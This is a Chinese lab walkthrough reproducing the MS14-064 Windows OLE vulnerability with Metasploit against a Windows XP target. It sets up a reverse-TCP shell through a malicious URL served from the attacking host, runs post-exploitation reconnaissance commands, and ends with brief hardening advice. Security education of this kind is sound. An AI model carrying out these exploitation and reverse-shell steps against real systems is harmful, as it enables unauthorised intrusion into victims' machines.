文章目录
- 环境说明
- 1 MS14_064 简介
- 2 MS14_064 复现过程
- 3 MS14_064 安全加固
环境说明
- 渗透机操作系统:kali-linux-2024.1-installer-amd64
- 漏洞复现操作系统: sc_winxp_pro_with_sp2
1 MS14_064 简介
要利用此漏洞则需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,需要该用户打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象,所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用此漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用此漏洞的 Office 文件。另外,受到破坏的网站以及接受或宿主用户提供的内容的网站可能包含可能利用此漏洞的经特殊设计的网站内容。攻击者无法强迫用户访问恶意网站。相反,攻击者必须劝诱用户访问该网站,通常是让用户单击通向攻击者站点的链接。
受影响的操作系统版本有:Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.
2 MS14_064 复现过程
在开始之前请关闭靶机的防火墙, 关于渗透机和靶机环境和服务器环境的搭建可自行Bing。
步骤01、
打开网络拓补,单机 “启动”按钮,启动实现虚拟机,如图所示。
步骤02、
使用ifconfig
和 ipconfig
命令分别获取渗透机和靶机的IP的地址,使用ping
命令进行网络 连通性测试,确保网络可达。
渗透机的IP 地址为 192.168.254.134,如图所示。
渗透机的IP地址
靶机的IP地址为 192.168.254.129,如图所示。
靶机的IP 地址
步骤03、
使用 msfconsole
命令打开 Metasploit 渗透测试平台,如图所示。
启动 Metasploit
步骤04、
使用 search
命令搜索 ms14_064_ole_execution 模块,如图所示。
搜索 MS14_064 溢出模块
步骤05、
使用 use
命令调用该模块,然后使用 show options
命令来查看需要配置的参数,如图所示。
查看配置参数
步骤06、
使用 set SRVHOST
命令设置本地监听的地址 SRVHOST,如图所示。
设置服务器地址
步骤07、
使用 set SRVPORT
命令设置本地监听的地址 SRVPORT,如图所示。
设置服务器端口号
步骤08、
使用 set URIPATH
命令设置要利用的网站的路径。如图所示。
设置服务器路径
步骤09、
使用 set payload
命令设置反弹连接的 Shell(windows/shell/reverse_tcp),同时设置反弹 Shell 回连的地址,如图所示。
设置载荷模块相关的参数
使用 set ALlowPowershellPrompt
命令设置为 true,因为 MSF 中自带的漏洞是利用 exp 调用的是powershell,所以 MSF 的 exp 代码只对安装了 powershell 的系统生效,这里我们来用 Windows XP 系统进行测试。
设置允许调用 powershell
步骤10、
使用 show options
命令查看所有参数配置是否正确,如图所示。
查看配置完成后的参数
步骤11、
所有参数设置完成后,使用 run
或者 exploit
命令执行漏洞利用模块的操作,如图所示。
运行模块
步骤12、
exploit 成功后生成带有攻击性的 URL,这里生成的 URL 为 http://192.168.254.134:8080/UIL5V8e2 ,然后在 Windows XP 操作系统上用 IE 浏览器打开,如图所示。
访问连接
成功获取到目标靶机系统的 Shell,如图所示。
查看渗透机 Metasploit 回显
使用 sessions -i
命令查看当前活跃的会话,然后使用 sessions -i id
命令进行不同会话之间切换,如图所示。
查看活跃会话
步骤13、
使用 systeminfo
命令收集靶机系统的基本信息,如图所示。
获得靶机系统的 Shell
使用 tasklist /svc
命令查看当前计算机的进程情况,如图所示。
查看计算机的进程情况
使用 netstat -ano
命令查看计算机的开放端口,如图所示。
查看开放端口
使用 wmic product > ins.txt
命令收集当前系统安装软件、版本以及安装路径等信息、此过程耗时比较久,在实际运行时可酌情选择,如图所示。
收集系统安装软件信息 (这一步我等待了十几个小时也没有成功,不清楚什么情况,有知道的可以在下面留言)
步骤14、
由于当前的载荷模块 shell/reverse_tcp 调用的是 cmd 终端,在后渗透阶段中,往往不能满足系统渗透信息收集的需求,所以为了系统完整的控制权,可以选择 meterpreter模块中的 reverse_tcp 载荷模块,输入 exit
命令 或按 <Ctrl + C>
键退出命令提示符终端界面,如图所示。
退出命令提示终端 (这里我图片漏截了,这里Ctrl + C 退出就行了。引用一下上面的图片)
步骤15、
使用 jobs
命令查看后台正在运行的模块,如果设置的端口被之前的模块占用,就使用 kill
命令来终止之前的工作,使用 rexploit
命令重新执行溢出模块,如图所示。
再次运行模块
3 MS14_064 安全加固
步骤16、
由于当前操作系统为 Windows XP,在微软官网上找不到更新的补丁,建议仍在使用 Windows XP 的用户可以更细到 Windows 10 操作系统并安装最新的补丁来提高系统的安全性,或者在系统中安装杀毒软件来加固自己的操作系统,如图所示。
官方安全公告
步骤17、
访问 Avira 官方网站下载最新版本的小红伞杀毒软件,如图所示。
下载杀毒软件